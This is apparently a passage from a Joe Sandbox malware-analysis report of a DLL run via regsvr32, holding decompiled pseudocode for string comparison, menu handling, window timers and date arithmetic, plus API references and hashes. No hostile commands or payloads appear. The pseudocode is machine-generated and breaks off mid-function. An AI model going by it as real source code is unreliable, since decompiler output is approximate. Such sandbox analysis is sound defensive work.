					if( *(_t167 + 8) == _t162) {
						_t109 =  *0x1004f724; // 0x0
						 *(_t167 + 8) = _t109;
					}
					_t142 =  *(_t167 + 0x20);
					__eflags = _t142 - _t162;
					if(_t142 == _t162) {
						_t142 =  *0x1004f734; // 0x0
					}
					_t166 = E1001A444(_t142,  *(_t167 + 8));
					__eflags = _t166 - 0xffffffff;
					if(_t166 != 0xffffffff) {
						__eflags = _t166 - _t142;
						if(__eflags == 0) {
							L67:
							_t165 = CompareStringA( *(_t167 + 8),  *(_t167 + 0xc),  *(_t167 + 0x10),  *(_t167 + 0x14),  *(_t167 + 0x18),  *(_t167 + 0x1c));
							__eflags = _t162;
							if(__eflags != 0) {
								_push(_t162);
								E100107C8(_t142, _t162, _t165, __eflags);
								_push( *(_t167 - 0x38));
								E100107C8(_t142, _t162, _t165, __eflags);
							}
							goto L69;
						}
						_push(0);
						_push(0);
						_push(_t167 + 0x14);
						_push( *(_t167 + 0x10));
						_push(_t166);
						_push(_t142);
						_t162 = E1001A487(_t142, _t162, _t166, __eflags);
						__eflags = _t162;
						if(__eflags == 0) {
							goto L61;
						}
						_push(0);
						_push(0);
						_push(_t167 + 0x1c);
						_push( *(_t167 + 0x18));
						_push(_t166);
						_push(_t142);
						_t106 = E1001A487(_t142, _t162, _t166, __eflags);
						 *(_t167 - 0x38) = _t106;
						__eflags = _t106;
						if(__eflags != 0) {
							 *(_t167 + 0x10) = _t162;
							 *(_t167 + 0x18) =  *(_t167 - 0x38);
							goto L67;
						}
						_push(_t162);
						E100107C8(_t142, _t162, _t166, __eflags);
					}
					goto L61;
				} else {
					if(_t144 != _t165) {
						L61:
						_t98 = 0;
						L70:
						return E1001254F(E100117AE(_t98,  *((intOrPtr*)(_t167 - 0x1c))));
					}
					 *(_t167 - 0x3c) = _t162;
					 *(_t167 - 0x44) = _t162;
					 *(_t167 - 0x40) = _t162;
					if( *(_t167 + 0x20) == _t162) {
						_t144 =  *0x1004f734; // 0x0
						 *(_t167 + 0x20) = _t144;
					}
					if( *(_t167 + 0x14) == _t162 || _t95 == _t162) {
						if( *(_t167 + 0x14) != _t95) {
							__eflags = _t95 - _t165;
							if(_t95 > _t165) {
								L69:
								_t98 = _t165;
								goto L70;
							}
							__eflags =  *(_t167 + 0x14) - _t165;
							if( *(_t167 + 0x14) <= _t165) {
								_t111 = GetCPInfo( *(_t167 + 0x20), _t167 - 0x30);
								__eflags = _t111;
								if(_t111 == 0) {
									goto L61;
								}
								__eflags =  *(_t167 + 0x14) - _t162;
								if( *(_t167 + 0x14) <= _t162) {
									__eflags =  *(_t167 + 0x1c) - _t162;
									if( *(_t167 + 0x1c) <= _t162) {
										goto L38;
									}
									__eflags =  *(_t167 - 0x30) - _t141;
									if( *(_t167 - 0x30) < _t141) {
										goto L69;
									}
									_t132 = _t167 - 0x2a;
									__eflags =  *((char*)(_t167 - 0x2a));
									if( *((char*)(_t167 - 0x2a)) == 0) {
										goto L69;
									} else {
										goto L33;
									}
									while(1) {
										L33:
										_t159 =  *((intOrPtr*)(_t132 + 1));
										__eflags = _t159;
										if(_t159 == 0) {
											goto L69;
										}
										_t154 =  *( *(_t167 + 0x18));
										__eflags = _t154 -  *_t132;
										if(_t154 <  *_t132) {
											L36:
											_t132 = _t132 + _t141;
											__eflags =  *_t132;
											if( *_t132 != 0) {
												continue;
											}
											goto L69;
										}
										__eflags = _t154 - _t159;
										if(_t154 <= _t159) {
											goto L17;
										}
										goto L36;
									}
									goto L69;
								}
								__eflags =  *(_t167 - 0x30) - _t141;
								if( *(_t167 - 0x30) < _t141) {
									goto L20;
								}
								_t133 = _t167 - 0x2a;
								__eflags =  *((char*)(_t167 - 0x2a));
								if( *((char*)(_t167 - 0x2a)) == 0) {
									goto L20;
								} else {
									goto L25;
								}
								while(1) {
									L25:
									_t160 =  *((intOrPtr*)(_t133 + 1));
									__eflags = _t160;
									if(_t160 == 0) {
										goto L20;
									}
									_t156 =  *( *(_t167 + 0x10));
									__eflags = _t156 -  *_t133;
									if(_t156 <  *_t133) {
										L28:
										_t133 = _t133 + _t141;
										__eflags =  *_t133;
										if( *_t133 != 0) {
											continue;
										}
										goto L20;
									}
									__eflags = _t156 - _t160;
									if(_t156 <= _t160) {
										goto L17;
									}
									goto L28;
								}
							}
							L20:
							_t98 = 3;
							goto L70;
						}
						L17:
						_t98 = _t141;
						goto L70;
					} else {
						L38:
						_t143 = MultiByteToWideChar( *(_t167 + 0x20), 9,  *(_t167 + 0x10),  *(_t167 + 0x14), _t162, _t162);
						 *(_t167 - 0x48) = _t143;
						__eflags = _t143 - _t162;
						if(_t143 == _t162) {
							goto L61;
						}
						 *(_t167 - 4) = _t162;
						E10010B20(_t143 + _t143 + 0x00000003 & 0xfffffffc, _t144);
						 *(_t167 - 0x18) = _t168;
						 *(_t167 - 0x34) = _t168;
						 *(_t167 - 4) =  *(_t167 - 4) | 0xffffffff;
						_t118 =  *(_t167 - 0x34);
						__eflags = _t118 - _t162;
						if(_t118 != _t162) {
							L43:
							_t119 = MultiByteToWideChar( *(_t167 + 0x20), _t165,  *(_t167 + 0x10),  *(_t167 + 0x14), _t118, _t143);
							__eflags = _t119;
							if(_t119 == 0) {
								L53:
								__eflags =  *(_t167 - 0x3c);
								if(__eflags != 0) {
									_push( *(_t167 - 0x34));
									E100107C8(_t143, _t162, _t165, __eflags);
								}
								_t98 =  *(_t167 - 0x40);
								goto L70;
							}
							_t165 = MultiByteToWideChar( *(_t167 + 0x20), 9,  *(_t167 + 0x18),  *(_t167 + 0x1c), 0, 0);
							 *(_t167 - 0x4c) = _t165;
							__eflags = _t165;
							if(_t165 == 0) {
								goto L53;
							}
							 *(_t167 - 4) = 1;
							E10010B20(_t165 + _t165 + 0x00000003 & 0xfffffffc, _t144);
							 *(_t167 - 0x18) = _t168;
							_t162 = _t168;
							 *(_t167 - 0x50) = _t162;
							 *(_t167 - 4) =  *(_t167 - 4) | 0xffffffff;
							__eflags = _t162;
							if(_t162 != 0) {
								L49:
								_t126 = MultiByteToWideChar( *(_t167 + 0x20), 1,  *(_t167 + 0x18),  *(_t167 + 0x1c), _t162, _t165);
								__eflags = _t126;
								if(_t126 != 0) {
									 *(_t167 - 0x40) = CompareStringW( *(_t167 + 8),  *(_t167 + 0xc),  *(_t167 - 0x34), _t143, _t162, _t165);
								}
								__eflags =  *(_t167 - 0x44);
								if(__eflags != 0) {
									_push(_t162);
									E100107C8(_t143, _t162, _t165, __eflags);
								}
								goto L53;
							} else {
								_t162 = E100107B6(_t165 + _t165);
								__eflags = _t162;
								if(_t162 == 0) {
									goto L53;
								}
								 *(_t167 - 0x44) = 1;
								goto L49;
							}
						} else {
							_t118 = E100107B6(_t143 + _t143);
							_pop(_t144);
							 *(_t167 - 0x34) = _t118;
							__eflags = _t118 - _t162;
							if(_t118 == _t162) {
								goto L61;
							}
							 *(_t167 - 0x3c) = _t165;
							goto L43;
						}
					}
				}
			}

0x1001c425
0x1001c427
0x1001c42c
0x1001c431
0x1001c436
0x1001c439
0x1001c43d
0x1001c43e
0x1001c444
0x1001c459
0x1001c463
0x1001c469
0x1001c46c
0x1001c46e
0x1001c46e
0x1001c45b
0x1001c45b
0x1001c45b
0x1001c459
0x1001c47b
0x1001c489
0x1001c489
0x1001c48c
0x1001c491
0x1001c497
0x1001c49d
0x1001c49d
0x1001c4a0
0x1001c4a8
0x1001c4ab
0x1001c6ea
0x1001c6ed
0x1001c6f0
0x1001c6f2
0x1001c6f7
0x1001c6f7
0x1001c6fa
0x1001c6fd
0x1001c6ff
0x1001c701
0x1001c701
0x1001c710
0x1001c712
0x1001c715
0x1001c71b
0x1001c71d
0x1001c768
0x1001c780
0x1001c782
0x1001c784
0x1001c786
0x1001c787
0x1001c78c
0x1001c78f
0x1001c795
0x00000000
0x1001c784
0x1001c71f
0x1001c721
0x1001c726
0x1001c727
0x1001c72a
0x1001c72b
0x1001c734
0x1001c736
0x1001c738
0x00000000
0x00000000
0x1001c73a
0x1001c73c
0x1001c741
0x1001c742
0x1001c745
0x1001c746
0x1001c747
0x1001c74f
0x1001c752
0x1001c754
0x1001c75f
0x1001c765
0x00000000
0x1001c765
0x1001c756
0x1001c757
0x1001c75c
0x00000000
0x1001c4b9
0x1001c4bb
0x1001c717
0x1001c717
0x1001c798
0x1001c7a8
0x1001c7a8
0x1001c4c1
0x1001c4c4
0x1001c4c7
0x1001c4cd
0x1001c4cf
0x1001c4d5
0x1001c4d5
0x1001c4db
0x1001c4e8
0x1001c4f1
0x1001c4f3
0x1001c796
0x1001c796
0x00000000
0x1001c796
0x1001c4f9
0x1001c4fc
0x1001c50d
0x1001c513
0x1001c515
0x00000000
0x00000000
0x1001c51b
0x1001c51e
0x1001c54b
0x1001c54e
0x00000000
0x00000000
0x1001c550
0x1001c553
0x00000000
0x00000000
0x1001c559
0x1001c55c
0x1001c560
0x00000000
0x00000000
0x00000000
0x00000000
0x1001c566
0x1001c566
0x1001c566
0x1001c569
0x1001c56b
0x00000000
0x00000000
0x1001c574
0x1001c576
0x1001c578
0x1001c582
0x1001c582
0x1001c584
0x1001c587
0x00000000
0x00000000
0x00000000
0x1001c589
0x1001c57a
0x1001c57c
0x00000000
0x00000000
0x00000000
0x1001c57c
0x00000000
0x1001c566
0x1001c520
0x1001c523
0x00000000
0x00000000
0x1001c525
0x1001c528
0x1001c52c
0x00000000
0x00000000
0x00000000
0x00000000
0x1001c52e
0x1001c52e
0x1001c52e
0x1001c531
0x1001c533
0x00000000
0x00000000
0x1001c538
0x1001c53a
0x1001c53c
0x1001c542
0x1001c542
0x1001c544
0x1001c547
0x00000000
0x00000000
0x00000000
0x1001c549
0x1001c53e
0x1001c540
0x00000000
0x00000000
0x00000000
0x1001c540
0x1001c52e
0x1001c4fe
0x1001c500
0x00000000
0x1001c500
0x1001c4ea
0x1001c4ea
0x00000000
0x1001c58e
0x1001c58e
0x1001c5a1
0x1001c5a3
0x1001c5a6
0x1001c5a8
0x00000000
0x00000000
0x1001c5ae
0x1001c5ba
0x1001c5bf
0x1001c5c4
0x1001c5c7
0x1001c5e9
0x1001c5ec
0x1001c5ee
0x1001c608
0x1001c614
0x1001c61a
0x1001c61c
0x1001c6d3
0x1001c6d3
0x1001c6d7
0x1001c6d9
0x1001c6dc
0x1001c6e1
0x1001c6e2
0x00000000
0x1001c6e2
0x1001c637
0x1001c639
0x1001c63c
0x1001c63e
0x00000000
0x00000000
0x1001c644
0x1001c654
0x1001c659
0x1001c65c
0x1001c65e
0x1001c661
0x1001c67f
0x1001c681
0x1001c69a
0x1001c6a7
0x1001c6ad
0x1001c6af
0x1001c6c3
0x1001c6c3
0x1001c6c6
0x1001c6ca
0x1001c6cc
0x1001c6cd
0x1001c6d2
0x00000000
0x1001c683
0x1001c68d
0x1001c68f
0x1001c691
0x00000000
0x00000000
0x1001c693
0x00000000
0x1001c693
0x1001c5f0
0x1001c5f4
0x1001c5f9
0x1001c5fa
0x1001c5fd
0x1001c5ff
0x00000000
0x00000000
0x1001c605
0x00000000
0x1001c605
0x1001c5ee
0x1001c4db

APIs

CompareStringW.KERNEL32(00000000,00000000,10042704,00000001,10042704,00000001,10042FA0,00000040,1001BF03,?,00000001,?,00000000,?,00000000,?), ref: 1001C451
GetLastError.KERNEL32(?,1001AE49,00000000,00000000,00000000,00000000,00000000,00000000,10018E57,10042CCC,10042CD0,00000018,10019429,10042CE0,00000008,10013474), ref: 1001C463
GetCPInfo.KERNEL32(00000000,00000000,10042FA0,00000040,1001BF03,?,00000001,?,00000000,?,00000000,?,?,1001AE49,00000000,00000000), ref: 1001C50D
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000004,00000000,00000000,?,1001AE49,00000000,00000000,00000000,00000000,00000000,00000000,10018E57,10042CCC), ref: 1001C59B
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000004,00000190,00000000,?,1001AE49,00000000,00000000,00000000,00000000,00000000,00000000,10018E57,10042CCC), ref: 1001C614
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,100101C3,00000000,00000000,?,1001AE49,00000000,00000000,00000000,00000000,00000000,00000000,10018E57,10042CCC), ref: 1001C631
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,100101C3,?,00000000,?,1001AE49,00000000,00000000,00000000,00000000,00000000,00000000,10018E57,10042CCC), ref: 1001C6A7

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ByteCharMultiWide$CompareErrorInfoLastString
String ID:
API String ID: 1773772771-0
Opcode ID: c77f23d90567df6e736b9aafa9777b77d817b83e23b873e610d66b8219189818
Instruction ID: f9a15a39c5567b5c4af314f3663c8d3c96b15f003a3eabc65cf21064ebdc607f
Opcode Fuzzy Hash: c77f23d90567df6e736b9aafa9777b77d817b83e23b873e610d66b8219189818
Instruction Fuzzy Hash: DCB1897690825EAFDF22CFA4DC95EAE7BF6EF05690F200119F840AA1A1D771D9D0CB50

Uniqueness

Uniqueness Score: -1.00%

Function 1003210C Relevance: 13.6, APIs: 9, Instructions: 137
windowCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E1003210C(intOrPtr __ecx, intOrPtr _a4, intOrPtr _a8, int _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				int _v16;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				int _v44;
				char _v48;
				void* __ebp;
				int _t59;
				int _t60;
				void* _t61;
				int _t63;
				signed int _t67;
				int _t68;
				void* _t69;
				int _t71;
				intOrPtr _t74;
				int _t75;
				int _t76;
				struct HMENU__* _t88;
				intOrPtr _t90;

				_t74 = __ecx;
				_v8 = __ecx;
				E10029BA4( *((intOrPtr*)(__ecx + 0x1c)));
				if(_a12 == 0) {
					_t90 = _a4;
					if( *((intOrPtr*)(__ecx + 0x7c)) == 0) {
						L3:
						E1001FFB4( &_v48);
						_v36 = _t90;
						if( *((intOrPtr*)(E100373A5() + 0x78)) !=  *(_t90 + 4)) {
							if(GetMenu( *(_t74 + 0x1c)) == 0) {
								L14:
								_t59 = GetMenuItemCount( *(_t90 + 4));
								_v40 = _v40 & 0x00000000;
								_v16 = _t59;
								if(_t59 <= 0) {
									L34:
									L35:
									return _t59;
								}
								do {
									_t60 = GetMenuItemID( *(_t90 + 4), _v40);
									_v44 = _t60;
									if(_t60 == 0) {
										goto L33;
									}
									if(_t60 != 0xffffffff) {
										_v32 = _v32 & 0x00000000;
										if( *((intOrPtr*)(_t74 + 0x50)) == 0 || _t60 >= 0xf000) {
											_t61 = 0;
										} else {
											_t61 = 1;
										}
										_push(_t61);
										L27:
										_push(_t74);
										E1001FFDA( &_v48);
										_t63 = GetMenuItemCount( *(_t90 + 4));
										_t75 = _t63;
										if(_t75 >= _v16) {
											L32:
											_v16 = _t75;
											_t74 = _v8;
											goto L33;
										}
										_v40 = _v40 + _t63 - _v16;
										while(_v40 < _t75) {
											if(GetMenuItemID( *(_t90 + 4), _v40) != _v44) {
												goto L32;
											}
											_v40 = _v40 + 1;
										}
										goto L32;
									}
									_t67 = E1000822C(_t90, _v40);
									_v32 = _t67;
									if(_t67 == 0) {
										goto L33;
									}
									_t68 = GetMenuItemID( *(_t67 + 4), 0);
									_v44 = _t68;
									if(_t68 != 0 && _t68 != 0xffffffff) {
										_push(0);
										goto L27;
									}
									L33:
									_v40 = _v40 + 1;
									_t59 = _v40;
								} while (_t59 < _v16);
								goto L34;
							}
							_t69 = E10023092(_t74);
							if(_t69 == 0) {
								goto L14;
							}
							_t88 = GetMenu( *(_t69 + 0x1c));
							if(_t88 == 0) {
								goto L14;
							}
							_t71 = GetMenuItemCount(_t88);
							_t76 = 0;
							_a12 = _t71;
							if(_t71 <= 0) {
								L13:
								_t74 = _v8;
								goto L14;
							}
							while(GetSubMenu(_t88, _t76) !=  *(_t90 + 4)) {
								_t76 = _t76 + 1;
								if(_t76 < _a12) {
									continue;
								}
								goto L13;
							}
							_push(_t88);
							_v12 = E10026280();
							goto L13;
						}
						_v12 = _t90;
						goto L14;
					}
					_push(0);
					_push(_a8);
					_push(_t90);
					_t59 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x7c)))) + 0x74))();
					if(0 != 0) {
						goto L35;
					}
					goto L3;
				}
				return 0;
			}

0x10032113
0x10032118
0x1003211b
0x10032125
0x1003212f
0x10032132
0x10032149
0x1003214d
0x10032152
0x10032160
0x10032174
0x100321bd
0x100321c0
0x100321c6
0x100321cc
0x100321cf
0x1003227f
0x10032280
0x00000000
0x10032280
0x100321db
0x100321e1
0x100321e5
0x100321e8
0x00000000
0x00000000
0x100321f1
0x1003221b
0x10032223
0x10032231
0x1003222c
0x1003222e
0x1003222e
0x10032233
0x10032234
0x10032237
0x10032238
0x10032240
0x10032246
0x1003224b
0x1003226a
0x1003226a
0x1003226d
0x00000000
0x1003226d
0x10032250
0x10032265
0x10032260
0x00000000
0x00000000
0x10032262
0x10032262
0x00000000
0x10032265
0x100321f8
0x100321ff
0x10032202
0x00000000
0x00000000
0x10032209
0x1003220d
0x10032210
0x10032217
0x00000000
0x10032217
0x10032270
0x10032270
0x10032273
0x10032276
0x00000000
0x100321db
0x10032178
0x1003217f
0x00000000
0x00000000
0x10032186
0x1003218a
0x00000000
0x00000000
0x1003218d
0x10032193
0x10032197
0x1003219a
0x100321ba
0x100321ba
0x00000000
0x100321ba
0x1003219c
0x100321a9
0x100321ad
0x00000000
0x00000000
0x00000000
0x100321af
0x100321b1
0x100321b7
0x00000000
0x100321b7
0x10032162
0x00000000
0x10032162
0x10032139
0x1003213a
0x1003213d
0x1003213e
0x10032143
0x00000000
0x00000000
0x00000000
0x10032143
0x10032283

APIs

Part of subcall function 10029BA4: GetFocus.USER32 ref: 10029BA5
Part of subcall function 10029BA4: GetParent.USER32(00000000), ref: 10029BCE
Part of subcall function 10029BA4: GetWindowLongA.USER32 ref: 10029BE9
Part of subcall function 10029BA4: GetParent.USER32(10032120), ref: 10029BF7
Part of subcall function 10029BA4: GetDesktopWindow.USER32 ref: 10029BFB
Part of subcall function 10029BA4: SendMessageA.USER32 ref: 10029C0F

GetMenu.USER32(?), ref: 10032170
GetMenu.USER32(?), ref: 10032184
GetMenuItemCount.USER32 ref: 1003218D
GetSubMenu.USER32 ref: 1003219E
GetMenuItemCount.USER32 ref: 100321C0
GetMenuItemID.USER32(?,00000000), ref: 100321E1
GetMenuItemID.USER32(?,00000000), ref: 10032209
GetMenuItemCount.USER32 ref: 10032240
GetMenuItemID.USER32(?,00000000), ref: 1003225B

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Menu$Item$Count$ParentWindow$DesktopFocusLongMessageSend
String ID:
API String ID: 4186786570-0
Opcode ID: 9b251247e75d24311a4f30fcd34c0b76c3a2b708c8d64061887fd89411845d20
Instruction ID: b99619ff26336beedcb7e2a7f55a8e8b58b7034f18844737f90654ad770cd7ca
Opcode Fuzzy Hash: 9b251247e75d24311a4f30fcd34c0b76c3a2b708c8d64061887fd89411845d20
Instruction Fuzzy Hash: 19415931900209AFDF42DFA4CE84AAEB7F5FF08792F214569E911EA152D731EE41DB60

Uniqueness

Uniqueness Score: -1.00%

Function 1002F502 Relevance: 13.6, APIs: 9, Instructions: 127
timekeyboardCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E1002F502(intOrPtr* __ecx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				struct tagPOINT _v20;
				void* __ebp;
				short _t42;
				signed int _t49;
				struct HWND__* _t60;
				intOrPtr _t63;
				intOrPtr _t66;
				void* _t68;
				void* _t71;
				void* _t74;
				intOrPtr _t83;
				void* _t84;
				intOrPtr _t85;
				struct HWND__* _t87;
				intOrPtr _t88;
				intOrPtr* _t89;
				void* _t90;

				_t89 = __ecx;
				_t42 = GetKeyState(1);
				if(_t42 < 0) {
					return _t42;
				}
				_t85 = E100373DB();
				_v12 = _t85;
				GetCursorPos( &_v20);
				ScreenToClient( *(_t89 + 0x1c),  &_v20);
				_t49 =  *((intOrPtr*)( *_t89 + 0x6c))(_v20.x, _v20.y, 0, _t84, _t71);
				_v8 = _t49;
				if(_t49 < 0) {
					 *(_t85 + 0x78) =  *(_t85 + 0x78) | 0xffffffff;
				} else {
					_t74 = E10023092(_t89);
					if(E100230BA() == 0 || E100203CE(_t74) == 0) {
						_v8 = _v8 | 0xffffffff;
					}
					_t66 =  *((intOrPtr*)(_t85 + 0x3c));
					if(_t66 != 0) {
						_t88 =  *((intOrPtr*)(_t66 + 0x1c));
					} else {
						_t88 = 0;
					}
					_t68 = E100220EE(_t90, GetCapture());
					if(_t68 != _t89) {
						if(_t68 != 0) {
							_t83 =  *((intOrPtr*)(_t68 + 0x1c));
						} else {
							_t83 = 0;
						}
						if(_t83 != _t88 && E10023092(_t68) == _t74) {
							_v8 = _v8 | 0xffffffff;
						}
					}
				}
				if(_v8 < 0) {
					L25:
					if( *(_v12 + 0x78) == 0xffffffff) {
						KillTimer( *(_t89 + 0x1c), 0xe001);
					}
					 *((intOrPtr*)( *_t89 + 0x160))(0xffffffff);
					goto L28;
				} else {
					ClientToScreen( *(_t89 + 0x1c),  &_v20);
					_push(_v20.y);
					_t87 = WindowFromPoint(_v20);
					if(_t87 == 0) {
						L23:
						_t59 = _v12;
						_v8 = _v8 | 0xffffffff;
						 *(_t59 + 0x78) =  *(_v12 + 0x78) | 0xffffffff;
						L24:
						if(_v8 >= 0) {
							L28:
							_t53 = 0xe000;
							if(_a4 == 0xe000) {
								_t53 = KillTimer( *(_t89 + 0x1c), 0xe000);
								if(_v8 >= 0) {
									_t53 =  *((intOrPtr*)( *_t89 + 0x160))(_v8);
								}
							}
							return _t53;
						}
						goto L25;
					}
					_t60 =  *(_t89 + 0x1c);
					if(_t87 == _t60 || IsChild(_t60, _t87) != 0) {
						goto L24;
					} else {
						_t63 =  *((intOrPtr*)(_v12 + 0x3c));
						if(_t63 != 0) {
							_t63 =  *((intOrPtr*)(_t63 + 0x1c));
						}
						if(_t63 == _t87) {
							goto L24;
						} else {
							goto L23;
						}
					}
				}
			}

0x1002f50b
0x1002f50d
0x1002f516
0x1002f660
0x1002f660
0x1002f523
0x1002f529
0x1002f52c
0x1002f539
0x1002f54b
0x1002f550
0x1002f553
0x1002f5b6
0x1002f555
0x1002f55e
0x1002f567
0x1002f574
0x1002f574
0x1002f578
0x1002f57d
0x1002f583
0x1002f57f
0x1002f57f
0x1002f57f
0x1002f58d
0x1002f594
0x1002f598
0x1002f59e
0x1002f59a
0x1002f59a
0x1002f59a
0x1002f5a3
0x1002f5b0
0x1002f5b0
0x1002f5a3
0x1002f594
0x1002f5c4
0x1002f61a
0x1002f621
0x1002f62b
0x1002f62b
0x1002f633
0x00000000
0x1002f5c6
0x1002f5cd
0x1002f5d3
0x1002f5df
0x1002f5e3
0x1002f609
0x1002f609
0x1002f60c
0x1002f610
0x1002f614
0x1002f618
0x1002f639
0x1002f639
0x1002f641
0x1002f647
0x1002f64d
0x1002f656
0x1002f656
0x1002f64d
0x00000000
0x1002f65d
0x00000000
0x1002f618
0x1002f5e5
0x1002f5ea
0x00000000
0x1002f5f8
0x1002f5fb
0x1002f600
0x1002f602
0x1002f602
0x1002f607
0x00000000
0x00000000
0x00000000
0x00000000
0x1002f607
0x1002f5ea

APIs

GetKeyState.USER32 ref: 1002F50D
GetCursorPos.USER32(?), ref: 1002F52C
ScreenToClient.USER32 ref: 1002F539
GetCapture.USER32 ref: 1002F586

Part of subcall function 100203CE: IsWindowEnabled.USER32(?), ref: 100203D7

ClientToScreen.USER32(?,?), ref: 1002F5CD
WindowFromPoint.USER32(?,?), ref: 1002F5D9
IsChild.USER32 ref: 1002F5EE
KillTimer.USER32(?,0000E001), ref: 1002F62B
KillTimer.USER32(?,0000E000), ref: 1002F647

Part of subcall function 100230BA: GetLastActivePopup.USER32(?), ref: 100230C3
Part of subcall function 100230BA: GetForegroundWindow.USER32(00000000,?,1002F565), ref: 100230D1

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$ClientKillScreenTimer$ActiveCaptureChildCursorEnabledForegroundFromLastPointPopupState
String ID:
API String ID: 1383385731-0
Opcode ID: cdf1f45528dd1ab4359947715924eeaa346914062a2f9e1f4d0b7eb2bc272758
Instruction ID: 10a8f74c3fcc8b415ddf3c509ebc5c8d81e0882429dab4cfcda73db0c152bb91
Opcode Fuzzy Hash: cdf1f45528dd1ab4359947715924eeaa346914062a2f9e1f4d0b7eb2bc272758
Instruction Fuzzy Hash: 1741AE31600619DFDB11DF65EC88A6E7BF6FF443A4FA18669E511D72A2DB30DE418B00

Uniqueness

Uniqueness Score: -1.00%

Function 1001328A Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 227
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E1001328A(void* __eax, signed int __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				char _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				intOrPtr _v32;
				void* __esi;
				void* __ebp;
				char _t72;
				signed int _t74;
				void* _t86;
				void* _t88;
				void* _t90;
				void* _t92;
				void* _t95;
				void* _t98;
				void* _t101;
				void* _t105;
				intOrPtr _t109;
				intOrPtr _t111;
				void* _t123;
				signed int _t124;
				signed int _t125;
				void* _t127;
				signed int _t133;
				signed int _t138;
				signed int _t139;
				void* _t141;
				signed int _t145;
				signed int _t150;
				signed int _t154;
				signed int _t156;
				signed int _t161;
				signed int _t163;
				void* _t171;

				_t138 = __edx;
				_t141 = __eax;
				_t72 =  *((intOrPtr*)(__eax + 0x14));
				asm("cdq");
				_t154 = __edx;
				_v16 = _t72;
				_v12 = __edx;
				if(_t154 < 0 || _t154 <= 0 && _t72 < 0x45) {
					L30:
					_t139 = _t138 | 0xffffffff;
					__eflags = _t139;
					return _t139;
				} else {
					_t156 = _v12;
					if(_t156 > 0 || _t156 >= 0 && _v16 > 0x44c) {
						goto L30;
					} else {
						_t74 =  *(_t141 + 0x10);
						if(_t74 < 0 || _t74 > 0xb) {
							asm("cdq");
							_t124 = 0xc;
							_t138 = _t74 % _t124;
							_t125 = _t138;
							asm("cdq");
							_v16 = _v16 + _t74 / _t124;
							 *(_t141 + 0x10) = _t125;
							asm("adc [ebp-0x8], edx");
							if(_t125 < 0) {
								_v16 = _v16 + 0xffffffff;
								 *(_t141 + 0x10) = _t125 + 0xc;
								asm("adc dword [ebp-0x8], 0xffffffff");
							}
							_t161 = _v12;
							if(_t161 < 0 || _t161 <= 0 && _v16 < 0x45) {
								goto L30;
							} else {
								_t163 = _v12;
								if(_t163 > 0 || _t163 >= 0 && _v16 > 0x44c) {
									goto L30;
								} else {
									goto L16;
								}
							}
						} else {
							L16:
							_t145 =  *(_t141 + 0x10);
							asm("cdq");
							_v24 =  *((intOrPtr*)(0x1004cecc + _t145 * 4));
							_v20 = _t138;
							if((E10019490(_v16, _v12, 4, 0) | _t138) != 0 || (E10019490(_v16, _v12, 0x64, 0) | _t138) == 0) {
								asm("adc ecx, 0x0");
								if((E10019490(_v16 + 0x76c, _v12, 0x190, 0) | _t138) != 0) {
									goto L21;
								}
								goto L19;
							} else {
								L19:
								if(_t145 > 1) {
									_v24 = _v24 + 1;
									asm("adc dword [ebp-0x10], 0x0");
								}
								L21:
								_t138 = _v12;
								_t127 = 0;
								_t147 = _v16 - 1;
								asm("sbb eax, ecx");
								_v28 = _v12;
								asm("adc edx, ecx");
								_v32 = _v16 - 1;
								_t86 = E10013780(_v16 + 0x12b, _t138, 0x190, _t127);
								asm("cdq");
								asm("adc ecx, edx");
								_v8 = _t138;
								_t88 = E10013780(_v16 - 1, _v28, 0x64, 0);
								asm("sbb eax, edx");
								_t90 = E10013780(_t147, _v28, 4, 0);
								asm("adc eax, edx");
